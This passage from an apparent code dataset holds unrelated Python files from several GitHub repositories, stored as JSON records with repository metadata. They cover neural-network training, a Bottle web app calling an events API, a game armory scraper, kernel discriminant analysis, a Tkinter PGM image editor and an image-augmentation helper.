sess.run(W3)\r\n\t\tweightList1.append(b[0])\r\n\t\tweightList2.append(b[1])\r\n\r\n\t\tc = sess.run(W4)\r\n\t\tweightList3.append(c[2])\r\n\t\tweightList4.append(c[3])\r\n\t\t# print(b[:,6:8])\r\n\r\n\t# context = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nimport matplotlib.pyplot as plt \r\nplt.figure(1)\r\nplt.subplot(411)\r\nplt.plot(weightList1)\r\nplt.subplot(412)\r\nplt.plot(weightList2)\r\nplt.subplot(413)\r\nplt.plot(weightList3)\r\nplt.subplot(414)\r\nplt.plot(weightList4)\r\nplt.ylabel('some numbers')\r\nplt.show()","repo_name":"dshahnazian/Recurrent-neural-network","sub_path":"Danesh_RNN_General.py","file_name":"Danesh_RNN_General.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6055658836","text":"import bottle\nfrom bottle import Bottle,route,run,request,template,static_file\nimport json\nfrom sys import argv\nimport 
requests\n@route('/',method=\"get\")\ndef eventfull():\n return template ('template.tpl')\n@route('/eventfull',method=\"post\")\ndef eventfull():\n ciudad = request.forms.get('ciudad')\n tipo = request.forms.get('tipo')\n a=open(\".key_eventfull.txt\",\"r\")\n key=a.readline()\n payload={\"app_key\":key, \"location\": ciudad, \"keywords\":tipo}\n r=requests.get(\"http://api.eventful.com/json/events/search?keywords=\"+tipo+\"&location=\"+ciudad+\"&app_key=\"+key)\n if r.status_code == 200:\n js=json.loads(r.text)\n titulo=[]\n empezar=[]\n lugar=[]\n for i in js[\"events\"][\"event\"]:\n titulo.append(i[\"title\"])\n empezar.append(i[\"start_time\"])\n lugar.append(i[\"venue_name\"])\n return template('template2.tpl', titulo=titulo, empezar=empezar, lugar=lugar, ciudad=ciudad, tipo=tipo)\n\n@route('/static/')\ndef server_static(filepath):\n\treturn static_file(filepath, root='static')\n\nif __name__ == '__main__':\n\trun(host='0.0.0.0',port=argv[1])","repo_name":"juanjoselopezroldan/prueba_bottle","sub_path":"eventfull.py","file_name":"eventfull.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18420184567","text":"\"\"\" Character Summary parsing functions \"\"\"\n\nimport re\n\nfrom src.itemParser import getItemInfos\nfrom src.utils import getHtmlText\nfrom src.gearScore import createGearScoreDictionnary\n\n\ndef hasEnchantProfession(profession, minProfLvl):\n \"\"\" Check if character has profession enchant above a determined level \"\"\"\n profLvl = int(re.search(r'\\d+', profession).group(0))\n return profLvl >= minProfLvl\n\n\ndef processItems(itemsList, isBlacksmith, isEnchanter, isHunter, isWarrior):\n \"\"\" Process each items to know if they are fully optimised \"\"\"\n\n notEnchantedItems = []\n notGemmedItems = []\n totalItemLvl = 0\n totalGearScore = 0\n equippedItems = 0\n # Fury war has special calculation method taking in account having 2 2H weaps\n hasAlreadyATwoHandWeapOn = False\n twoHandWeapGearScore = [0, 0]\n # Calling it here so we only create it once per command\n gearScoreDict = createGearScoreDictionnary()\n\n excludedSlots = ['Shirt', 'Tabard']\n itemsToBeEnchant = ['Head', 'Shoulder', 'Back', 'Chest',\n 'Wrist', 'Hands', 'Legs', 'Feet',\n 'One-hand', 'Off Hand', 'Two-hand']\n\n if isEnchanter:\n itemsToBeEnchant.append('Finger')\n if isHunter:\n itemsToBeEnchant.append('Ranged')\n\n # Blacksmith can get another gem slot on some items (badly reported in url)\n itemsToBeBlacksmithEnchant = ['Wrist', 'Hands']\n\n for item in itemsList:\n # Power is there to reach an 'API' (not a real one btw...)\n itemUrl = item.find('a').get('href') + '&power=true'\n infosFromRel = item.find('a').get('rel')\n itemAdditionnalInfos = re.search(\n '&{1}.*', infosFromRel[0]) if infosFromRel is not None else None\n\n if itemAdditionnalInfos is not None:\n itemAdditionnalInfos = itemAdditionnalInfos.group(0)\n itemUrl += itemAdditionnalInfos\n\n if '#self' not in itemUrl:\n itemInfos = getItemInfos(itemUrl, gearScoreDict)\n itemSlot = itemInfos['itemSlot']\n\n hasToHaveBonusGemSlot = itemSlot == 'Waist' or (\n itemSlot in itemsToBeBlacksmithEnchant and isBlacksmith)\n if hasToHaveBonusGemSlot:\n itemInfos = getItemInfos(itemUrl, gearScoreDict, hasToHaveBonusGemSlot)\n\n # Checking what is missing in item\n if itemInfos['missingGems']:\n notGemmedItems.append(itemSlot)\n if itemInfos['missingEnchant'] and itemSlot in itemsToBeEnchant:\n notEnchantedItems.append(itemSlot)\n if itemSlot 
not in excludedSlots:\n equippedItems += 1\n totalItemLvl += itemInfos['itemLevel']\n totalGearScore += itemInfos['itemGearScore']\n\n # pylint: disable=too-many-boolean-expressions\n if isWarrior and (itemInfos['itemSlot'] == 'Two-hand' or (\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Two-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'One-hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Off Hand') or\n (hasAlreadyATwoHandWeapOn and itemInfos['itemSlot'] == 'Held In Off-Hand')\n )):\n minGs = min(twoHandWeapGearScore)\n twoHandWeapMinIndex = twoHandWeapGearScore.index(minGs)\n twoHandWeapGearScore[twoHandWeapMinIndex] = itemInfos['itemGearScore']\n\n # Getting new values after modifications\n minGs = min(twoHandWeapGearScore)\n maxGs = max(twoHandWeapGearScore)\n\n # To calculate gearscore, we have to ignore the second 2H weap GS,\n # get the difference between Main Hand and Off Hand\n # divide it by 2, round it up and substract it to the total sum\n # If difference is equal to 1\n # That means we are crawling first weapon or the character is wearing only\n # one Two hands weapon\n if minGs != 0:\n differenceBetweenTwoHandWeaps = int((maxGs - minGs)/2) + 1\n\n if hasAlreadyATwoHandWeapOn:\n totalGearScore -= minGs + differenceBetweenTwoHandWeaps\n else:\n hasAlreadyATwoHandWeapOn = True\n\n if equippedItems != 0:\n avgItemLvl = \"%.2f\" % float(totalItemLvl/equippedItems)\n else:\n avgItemLvl = 0\n\n return {\n 'notEnchantedItems': notEnchantedItems,\n 'notGemmedItems': notGemmedItems,\n 'avgItemLvl': avgItemLvl,\n 'itemGearScore': totalGearScore,\n }\n\n\ndef processList(providedList):\n \"\"\" Process the provided items list \"\"\"\n items = []\n\n for item in providedList.findAll(class_='text'):\n items.append(' '.join(item.text.split()).replace(' / ', '/'))\n\n return items\n\n\ndef getCharInfos(\n url='http://armory.warmane.com/character/Ashaladin/Icecrown/summary', htmlText=None\n):\n \"\"\" Get character informations \"\"\"\n\n if htmlText is None:\n html = getHtmlText(url)\n else:\n html = htmlText\n\n # Ensure char is found before scrap anything else\n if len(html.findAll(string=re.compile(r'Page not found'))) > 0:\n return 'Character not found, please check your informations and try again.'\n\n charMainInfos = html.find(class_='information-left')\n\n # Hunter will need to have Ranged slot checked (enchant)\n isHunter = 'Hunter' in charMainInfos.text\n isWarrior = 'Warrior' in charMainInfos.text\n\n # Grouping variables:\n # First group is html info retrieving\n # Second is extracted data\n charAndGuildName = charMainInfos.find(class_='name').text.split(' ')\n itemsPath = html.findAll(class_='item-slot')\n specsPath = html.find(class_='specialization')\n professionsSummary = []\n professionsPath = html.findAll(class_='profskills')\n isBlacksmith = False\n isEnchanter = False\n\n charName = charAndGuildName.pop(0).strip()\n guildName = ' '.join(charAndGuildName) if charAndGuildName[0] != u'\\xa0' else 'No Guild'\n lvlRaceClass = charMainInfos.find(class_='level-race-class').text.strip()\n\n professions = []\n for professionsType in professionsPath:\n professions.append(processList(professionsType))\n\n # Processing multiple arrays into one (1 array per professionType (main & secondary profs))\n for professionType in professions:\n for profession in professionType:\n # We have to check blacksmith level to ensure the bonus gem slots are available\n if 'Blacksmithing' in profession:\n isBlacksmith = hasEnchantProfession(profession, 
400)\n            if 'Enchanting' in profession:\n                isEnchanter = hasEnchantProfession(profession, 400)\n            professionsSummary.append(profession)\n\n    getSpecializations = processList(specsPath)\n    itemsCheck = processItems(itemsPath, isBlacksmith, isEnchanter, isHunter, isWarrior)\n\n    summary = {\n        'url': url,\n        'charName': charName,\n        'guildName': guildName,\n        'lvlRaceClass': lvlRaceClass,\n        'professions': professionsSummary,\n        'specs': getSpecializations,\n        'itemsCheck': itemsCheck\n    }\n\n    return summary\n","repo_name":"Rdyx/warmane-armory-bot","sub_path":"src/charsumParser.py","file_name":"charsumParser.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26780102096","text":"#like a list, but each element can be added only once\nlistem=[1,2,3,2,3]\nsetim=set(listem)\nprint(setim)\n#defining a set directly\nset2={\"a\",\"b\",\"c\"}\nset2.add(\"d\")\nprint(set2)\n#defining an empty set\nset3=set()\n","repo_name":"semihuzunCE/Python","sub_path":"3-setler.py","file_name":"3-setler.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40739251764","text":"\"\"\"\r\nThis is a test for classifying the trajectories.\r\nWe have three kinds of trajectories: | L_D | c_aphi | c_h |\r\n                   with label:        |  0  |   1    |  2  |\r\n\r\nTry to use a linear+LSTM+linear NET.\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport os\r\nfrom utils.dataset import dataset,collate_fn\r\nimport torch.nn as nn\r\nimport torch.optim\r\nimport torch.utils.data as Data\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom Classify_net import Classify\r\nfrom utils.d_process import *\r\nfrom torch.optim import lr_scheduler\r\nfrom train_util import train, trainlog\r\nimport logging\r\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n# Hyper Parameters\r\nINPUT_SIZE = 6\r\nOUTPUT_SIZE = 3\r\nTIME_STEP = 1200\r\nLINEAR1_OUT = 32 # D: extract additional features from the 6-dim input *2\r\nHIDDEN_SIZE = 64 # note: debug logging\r\nBATCH_SIZE = 64 #NUM_LATERS = 2 #\r\nLR = 0.01\r\nN_TRAIN_POINTS = 100 #not used\r\nEPOCH = 1000 #not used\r\nMAX_LEN = 600\r\n\r\nsave_dir = r'F:\\classi\\model_test_1_16/'\r\nif not os.path.exists(save_dir):\r\n    os.makedirs(save_dir)\r\nlogfile = '%s/trainlog.log'%save_dir\r\ntrainlog(logfile)\r\n# raw data\r\nrawdata_root = r'F:\\classi\\train/'\r\n# read the labels\r\nall_pd = pd.read_csv(r\"F:\\HXDD/dataset_train.csv\", sep=\",\",\r\n                     header=None,\r\n                     names=[\"file_name\",\"label\"])[1:] ## what is the r'' prefix for? dataset_train.csv seems a bit off\r\n\r\n#print(all_pd.head())\r\n# split into training and test data\r\ntrain_pd, val_pd = train_test_split(all_pd, test_size=0.25, random_state=43,\r\n                                    stratify=all_pd['label']) # look up how this function works 2020-10-20; it may mean the label is only 1-dimensional\r\n# print(val_pd.shape)\r\n\r\n# data pre-processing\r\ndata_process = {\r\n    'train':data_process(max_len=MAX_LEN),\r\n    'val':data_process(max_len=MAX_LEN)\r\n}\r\ndata_set={}\r\ndata_set['train']=dataset(trajroot=rawdata_root, anno_pd=train_pd,\r\n                          dprocess=data_process['train']) # train_pd should be changed to val_pd; it was originally train_pd\r\ndata_set['val']=dataset(trajroot=rawdata_root, anno_pd=val_pd,\r\n                        dprocess=data_process['val']) # train_pd should be changed to val_pd; it was originally train_pd\r\n# read the data and pack it into batches\r\ndataloader={}\r\ndataloader['train']=torch.utils.data.DataLoader(data_set['train'],batch_size=BATCH_SIZE,\r\n                                                shuffle=True,num_workers=0,collate_fn=collate_fn) 
# num_workers determines how many worker processes are used\r\n\r\ndataloader['val']=torch.utils.data.DataLoader(data_set['val'],batch_size=BATCH_SIZE,\r\n                                              shuffle=True,num_workers=0,collate_fn=collate_fn)\r\n\r\n'''model'''\r\nmodel = Classify()\r\nbase_lr = 0.01\r\nresume = None\r\n# use resume=None for the first run\r\n# resume=None\r\nif resume:\r\n    # load an existing model\r\n    model.eval()\r\n    model.load_state_dict(torch.load(resume))\r\nmodel.double() # the data has to be converted before moving it to CUDA\r\nmodel.cuda()\r\n\r\n\r\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001,betas=(0.9, 0.999), eps= 1e-08, weight_decay=1e-5)\r\ncriterion = nn.CrossEntropyLoss()\r\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=50, gamma=0.1) # set the learning rate: lr*gamma^(epoch/step_size)\r\nif __name__ == '__main__':\r\n    train(model,\r\n          epoch_num=100,\r\n          start_epoch=0,\r\n          optimizer=optimizer,\r\n          criterion=criterion,\r\n          exp_lr_scheduler=exp_lr_scheduler,\r\n          data_set=data_set,\r\n          data_loader=dataloader,\r\n          save_dir=save_dir,\r\n          print_inter=50,\r\n          val_inter=400)\r\n\r\n","repo_name":"Xie-JunWei/lstm-network","sub_path":"classify/classify_train.py","file_name":"classify_train.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71150670171","text":"from wb0configs import configs\nfrom wb0configs.helpers import store_file, load_file\nfrom collections import defaultdict\nimport random\nimport torch\nfrom tqdm import tqdm\n\n\ndef pool_sections_embed(e_id_sec_embed):\n    print(\"pool_sections_embed\")\n\n    e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n    #e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n\n    if e_id_embed == None:\n        e_id_embed = dict()\n\n        for e, sec in e_id_sec_embed.items():\n            e_id_embed[e] = torch.mean(torch.stack(list(sec.values())), dim=0)\n\n        store_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", e_id_embed, \"pkl\", \"csv\")\n    return e_id_embed\n\n\n\ndef create_node_features(node_list, e_id_embed):\n    print(\"create_node_features\")\n\n    #node_features = torch.Tensor(len(node_list),768)\n    node_features = dict()\n\n    for i, (e_id, e_features) in enumerate(node_list):\n        if e_id in e_id_embed.keys():\n            e_emb = e_id_embed[e_id]\n            #node_features[i] = e_emb\n            node_features[e_id] = e_emb\n        else: ## for some entities there exist no embeddings\n            e_id= random.choice(node_list)[0]\n            e_emb = e_id_embed[e_id]\n            #node_features[i] = e_emb\n            node_features[e_id] = e_emb\n\n    return node_features\n\n\n\ndef create_edge_features(aggr_edge_list, c_id_ent_id_embed):\n    print(\"create_edge_features\")\n\n    #edge_features = torch.Tensor(len(aggr_edge_list), 768)\n    edge_features = defaultdict(torch.FloatTensor)\n\n    for i, (e_id_1, e_id_2, c_features) in tqdm(enumerate(aggr_edge_list)):\n        c_ids = c_features[\"conflict_ids\"]\n        for c_id in c_ids:\n            #edge_features[i] = c_id_ent_id_embed[c_id][0]\n            edge_features[(e_id_1, e_id_2)] = torch.cat((edge_features[(e_id_1, e_id_2)], c_id_ent_id_embed[c_id].view(1,-1)),0)\n        edge_features[(e_id_1, e_id_2)] = torch.mean(edge_features[(e_id_1, e_id_2)], 0)\n    return edge_features\n\n\nif __name__ == \"__main__\":\n\n    config = configs.ConfigBase()\n\n    node_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"node_list\", ftype = \"pkl\")\n    e_id_sec_embed = load_file(config.get_path(\"entity_embed\") / \"e_id_sec_embed_tfidf\", ftype=\"pkl\")\n    e_id_embed = pool_sections_embed(e_id_sec_embed)\n\n    node_features = 
create_node_features(node_list, e_id_embed)\n\n aggr_edge_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"aggr_edge_list\", ftype = \"pkl\")\n c_id_ent_id_embed = load_file(config.get_path(\"conflict_embed\") / \"c_id_ent_id_embed_tfidf\", ftype=\"pkl\")\n edge_features = create_edge_features(aggr_edge_list, c_id_ent_id_embed)\n\n store_file(config.get_path(\"task\") / \"network_features\" / \"node_features\", node_features, \"pkl\", \"csv\")\n store_file(config.get_path(\"task\") / \"network_features\" / \"edge_features\", edge_features, \"pkl\", \"csv\")\n\n","repo_name":"conflict-AI/conflictwiki","sub_path":"code/wb4task/task_construction/network_features.py","file_name":"network_features.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"27898216650","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.metrics.pairwise import rbf_kernel, polynomial_kernel,linear_kernel\n\n\n\nclass centred_kernel(object):\n def __init__(self, kernel, centred=True, gamma=None, degree=3, coef0=1):\n self._kernel_type = kernel\n self._gamma = gamma\n self._degree = degree\n self._coef0 = coef0\n self._centred = centred\n\n def fit(self, X):\n self._X = X.copy()\n return self\n\n def fit_transform(self, X):\n self._X = X.copy()\n self._n = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, degree=self._degree, coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n\n \"\"\"\n sumK = np.sum(K, 0)\n K1 = 1. / self._n * np.tile(np.reshape(sumK, (-1, 1)), (1, self._n))\n K2 = 1. / self._n * np.tile(np.reshape(sumK, (1, -1)), (self._n, 1))\n self._K = K.copy()\n Ko = K - K1 - K2 + np.mean(K)\n else:\n Ko = K\n return Ko\n\n def transform(self, X):\n nt = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, self._X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, self._X, degree=self._degree,\n coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X, self._X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n \"\"\"\n K1 = (K - 1. / self._n * np.ones((nt, self._n)).dot(self._K))\n K2 = np.eye(self._n) - 1. 
/ self._n * np.ones((self._n, self._n))\n            Ko = K1.dot(K2)\n        else:\n            Ko = K\n        return Ko\n\n\n\ndef sorted_spectrum(A):\n    complex_eig_val, complex_eig_vec = np.linalg.eig(A)\n    eig_val = complex_eig_val.real\n    orden = np.argsort(eig_val)[::-1]\n    eig_val = eig_val[orden]\n    eig_vec = complex_eig_vec.real\n    eig_vec = eig_vec[:,orden]\n    return eig_val, eig_vec\n\ndef kgda(K, y, tau = 1e-6):\n    # K already centred!!\n    n = K.shape[0]\n    v_classes = np.unique(y)\n    M_ = np.mean(K,1)\n    P = len(v_classes)\n    M_Mp = np.empty((n,P))\n    #Sb\n    Sb = np.zeros((n,n))\n    Sw = np.zeros((n,n))\n    for p in range(P):\n        idx_class_p = np.where(y==v_classes[p])[0]\n        n_p = len(idx_class_p)\n        Kp = K[:,idx_class_p]\n        Mp = np.mean(Kp,1)\n        M_Mp[:,p] = Mp.copy()\n        MpM_ = Mp - M_\n        Sb += n_p* np.outer(MpM_, MpM_.T) # column * row\n        Sw += 1./n_p* Kp.dot(Kp.T) - np.outer(Mp, Mp.T)\n    #Sw inv\n    if np.linalg.matrix_rank(Sw) < n:\n        Sw += tau*np.eye(n)\n    iSw = np.linalg.inv(Sw)\n    AA = iSw.dot(Sb)\n    DD2, UU2 = sorted_spectrum(AA)\n    lam = DD2[:P-1]\n    A = UU2[:,:P-1]\n    VMp = A.T.dot(M_Mp)\n    return A, VMp.T\n\ndef predict_kgda(K_test, A, Q, v_classes=None):\n    # Ktest centred!!\n    # Q projection of class means!!\n    if v_classes is None:\n        P = Q.shape[0]\n        v_classes = np.array([int(cc) for cc in range(P)])\n    U = K_test.dot(A)\n    Distance_sample_mean = pairwise_distances(U, Q)\n    closest_mean = np.argmin(Distance_sample_mean,1)\n    output = np.array([v_classes[ii] for ii in closest_mean])\n    return output, U","repo_name":"fredchettouh/uc3m_ml","sub_path":"kernel_mva/klda.py","file_name":"klda.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29133475410","text":"import numpy\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\n\r\n#Reading of the original file\r\ndef get_pgm_data():\r\n    try:\r\n        global filename\r\n        filename = e.get()\r\n        with open(filename, \"r\") as f:\r\n            content = f.readlines()\r\n        global size\r\n        size=[]\r\n        global Lmax \r\n        Lmax=0\r\n        global data\r\n        data=[]\r\n        global comments\r\n        comments=[]\r\n        for line in list(content):\r\n            if line[0] == \"#\":\r\n                comments.append(line)\r\n                content.remove(line)\r\n        if content[0].strip() != \"P2\":\r\n            e.delete(0, END)\r\n            status['text'] = \"Това не е PGM файл\"\r\n        else:\r\n            size = [int(el) for el in content[1].strip().split()]\r\n            Lmax = int(content[2].strip())\r\n            for line in content[3:]:\r\n                for el in line.split():\r\n                    data.append(int(el))\r\n            #get_file_button['state'] = DISABLED #if you remove the comment the program will work only with 1 file \r\n            status['text'] = \"Файлът беше успешно зареден\"\r\n            open_file['state'] = ACTIVE\r\n    except OSError:\r\n        status['text'] = \"Файлът не е намерен\"\r\n        \r\n#Showing the original image on the screen\r\ndef open_original_pgm():\r\n    original_image = Toplevel(root)\r\n    original_image.iconbitmap(\"img\\\\icona.ico\")\r\n    original_image.title(filename)\r\n    original_image.resizable(0,0)\r\n    original_image.transient(root)\r\n    #using numpy array to get the image information\r\n    new_data = numpy.array(data).reshape(size[1], size[0])\r\n    #creating and displaying of the image on the screen\r\n    img = ImageTk.PhotoImage(image = Image.fromarray(new_data))\r\n    c = Canvas(original_image, width=size[0], height=size[1])\r\n    c.pack()\r\n    c.create_image(0,0, anchor=\"nw\", image = img)\r\n    #right click mouse event for showing the additional field on the screen\r\n    c.bind(\"<Button-3>\", enable_mod)\r\n    koef_text = Label(original_image, text=\"коефициент:\")\r\n    
koef_text.pack(side=LEFT)\r\n\r\n k_v = Entry(original_image, width=15)\r\n k_v.pack(side=LEFT)\r\n\r\n stepen_text = Label(original_image,text=\"степен:\")\r\n stepen_text.pack(side=LEFT)\r\n\r\n img4 = PhotoImage(file=\"img\\\\adjust.png\")\r\n\r\n s_v = Entry(original_image, width=15)\r\n s_v.pack(side=LEFT)\r\n #calling the input validation function for both fields to ensure only numerals are entered\r\n reg = original_image.register(only_numbers)\r\n k_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n s_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n #lambda function to use the inputs from the fields otherwise tkinter can't use them\r\n x = lambda:open_modified_pgm(float(k_v.get()), float(s_v.get()))\r\n\r\n global modify\r\n modify = Button(original_image, image=img4, compound=\"left\", text= \"Промени\", state=DISABLED, command=x)\r\n modify.pack(side=RIGHT)\r\n\r\n #positioning of the image according to the main window\r\n original_image.update_idletasks()\r\n windowWidth = original_image.winfo_reqwidth()\r\n windowHeight = original_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(original_image.winfo_screenwidth()/2 - windowWidth/2-(windowHeight/2))\r\n positionDown = int(original_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n original_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n original_image.mainloop()\r\n \r\n#Showing the moified image on the screen\r\ndef open_modified_pgm(k,s):\r\n modified_image = Toplevel(root)\r\n modified_image.iconbitmap(\"img\\\\icona.ico\")\r\n modified_image.title(filename.rstrip(\".pgm\")+\"_mod.pgm\")\r\n modified_image.resizable(0,0)\r\n modified_image.transient(root)\r\n global data1\r\n #creating and modifying of the new image \r\n data1 = numpy.array(data).reshape(size[1], size[0])\r\n with numpy.nditer(data1, op_flags=['readwrite']) as it:\r\n for x in it:\r\n x[...] 
= Lmax*(x/Lmax)**(k/s)\r\n    img = ImageTk.PhotoImage(image = Image.fromarray(data1))\r\n    c = Canvas(modified_image, width=size[0], height=size[1])\r\n    c.pack()\r\n    c.create_image(0,0, anchor=\"nw\", image = img)\r\n    img5 = PhotoImage(file=\"img\\\\sd-card.png\")\r\n    open_file = Button(modified_image, image=img5, compound=\"left\", text= \"Запази\", command=save_new_pgm, state=ACTIVE)\r\n    open_file.pack(side=BOTTOM)\r\n    modify['state'] = DISABLED\r\n    status['text'] = \"Модификация на файла...\"\r\n    #positioning of the image according to the main window\r\n    modified_image.update_idletasks()\r\n    windowWidth = modified_image.winfo_reqwidth()\r\n    windowHeight = modified_image.winfo_reqheight()\r\n    # Gets both half the screen width/height and window width/height\r\n    positionRight = int(modified_image.winfo_screenwidth()/2 - windowWidth/2+(windowHeight/2))\r\n    positionDown = int(modified_image.winfo_screenheight()/2 - windowHeight/2)\r\n    # Positions the window in the center of the page.\r\n    modified_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n    modified_image.mainloop()\r\n    \r\n#saving the modified image as a file\r\ndef save_new_pgm():\r\n    with open(filename.rstrip(\".pgm\")+\"_mod.pgm\", \"w\") as f:\r\n        f.writelines(\"P2\\n\")\r\n        f.writelines(\"# modified by PGM Read&Modify\\n\")\r\n        for line in list(comments):\r\n            #if the file was already modified by the program, making sure to remove the comment\r\n            if line.strip() == \"# modified by PGM Read&Modify\":\r\n                comments.remove(line)\r\n            else:\r\n                f.writelines(line)\r\n        f.writelines(str(size[0])+\" \"+str(size[1])+\"\\n\")\r\n        f.writelines(str(Lmax)+\"\\n\")\r\n        #formatting the image information so it can be displayed properly by any app\r\n        for line in data1.tolist():\r\n            f.writelines(str(line)[str(line).find(\"[\")+1 : str(line).find(\"]\")].replace(\",\", \"\")+\"\\n\") \r\n    status['text'] = \"Файлът беше записан успешно като \"+filename.rstrip(\".pgm\")+\"_mod.pgm\"\r\n\r\n#input validation to make sure the input is either a number, a space or a dot for floating numbers\r\ndef only_numbers(inp):\r\n    if inp.isdigit():\r\n        return True\r\n    elif inp == \"\":\r\n        return True\r\n    elif inp == \".\":\r\n        return True\r\n    else:\r\n        return False\r\n\r\n#changing the state of \"Change\" button(\"Промени\")\r\ndef enable_mod(event):\r\n    modify['state'] = ACTIVE\r\n\r\n#using this to be able to call get_pgm_data via enter button\r\ndef call_get_pgm(event):\r\n    get_pgm_data()\r\n\r\n#function to use in event to create a popup menu\r\ndef popup(event):\r\n    try:\r\n        popup_menu.tk_popup(event.x_root, event.y_root,0)\r\n    finally:\r\n        popup_menu.grab_release()\r\n\r\n\r\n\r\n#Creating of the main window\r\nroot = Tk()\r\nroot.iconbitmap(\"img\\\\icona.ico\")\r\nroot.title(\"PGM Read&Modify\")\r\nroot.resizable(0,0) #this disables resizing of the window\r\n#root.attributes(\"-toolwindow\",1) #hides the window control button under windows. As a side effect it also hides the program icon.\r\n#root.overrideredirect(1) #hides all the elements of the window control manager. 
Bad idea to use under windows, works on linux or mac though.\r\n\r\n#Creating the top frame where the buttons and path to file elements reside\r\ntop_frame = Frame(root)\r\ntop_frame.pack(side=TOP, fill=X)\r\n\r\n#Creating of the bottom frame to hold the status bar element\r\nbottom_frame = Frame(root)\r\nbottom_frame.pack(side=BOTTOM, fill=X)\r\nfilename = Label(top_frame, text=\"Файл:\")\r\nfilename.pack(side=LEFT, anchor=W)\r\ne = Entry(top_frame, width=67)\r\ne.pack(side=LEFT)\r\ne.focus()\r\ne.bind(\"<Return>\", call_get_pgm)\r\n\r\n#Creates the popup menu with an option to exit the program\r\npopup_menu = Menu(root, tearoff=0)\r\npopup_menu.add_command(label=\"Exit\", command=root.destroy)\r\n\r\n#Creating the images for the buttons\r\nimg = ImageTk.PhotoImage(Image.open(\"img\\\\pgm.jpg\"))\r\nimg1 = PhotoImage(file = \"img\\\\file.png\")\r\nimg2 = PhotoImage(file =\"img\\\\display.png\")\r\nbackground = Label(bottom_frame,image=img)\r\nbackground.pack(side=TOP)\r\n\r\nstatus_text = Label(bottom_frame, text=\"статус:\", bd=1, relief=SUNKEN)\r\nstatus_text.pack(side=LEFT)\r\n\r\nstatus = Label(bottom_frame, text=\"Изчакване\", bd=1, relief=SUNKEN, anchor=W)\r\nstatus.pack(side=BOTTOM, fill=X)\r\n\r\nroot.bind(\"<Button-3>\", popup)\r\n\r\nget_file_button = Button(top_frame, image=img1, text=\"Отвори\", command=get_pgm_data, state=ACTIVE, compound=\"left\")\r\nget_file_button.pack(side=RIGHT)\r\n\r\nopen_file = Button(top_frame, image=img2, text= \"Покажи\", command=open_original_pgm, state=DISABLED, compound=\"left\")\r\nopen_file.pack(side=LEFT)\r\n\r\n#Centering of the main window according to screen resolution\r\nroot.withdraw()\r\nroot.update_idletasks()\r\nx = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\r\ny = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\r\nroot.geometry(\"+%d+%d\" % (x, y))\r\nroot.deiconify()\r\n\r\nroot.mainloop()\r\n","repo_name":"mazirah/PGM-Read-Modify","sub_path":"pgm read&modify.py","file_name":"pgm read&modify.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26727665845","text":"\"\"\"Datasets utilities.\"\"\"\n\nfrom __future__ import annotations\n\nimport albumentations\nimport numpy as np\nimport tensorflow as tf\n\nfrom pathlib import PurePath\nfrom rasterio.io import MemoryFile\n\n\ndef augment_image_dataset(dataset: tf.data.Dataset,\n                          transforms: albumentations.Compose,\n                          augment_labels: bool = False) -> tf.data.Dataset:\n    \"\"\"Augments a non-batched dataset using the given transforms.\"\"\"\n\n    def _augment(image, label):\n        if augment_labels:\n            data = {\"image\": image, \"mask\": label}\n            augmented = transforms(**data)\n            return augmented[\"image\"], 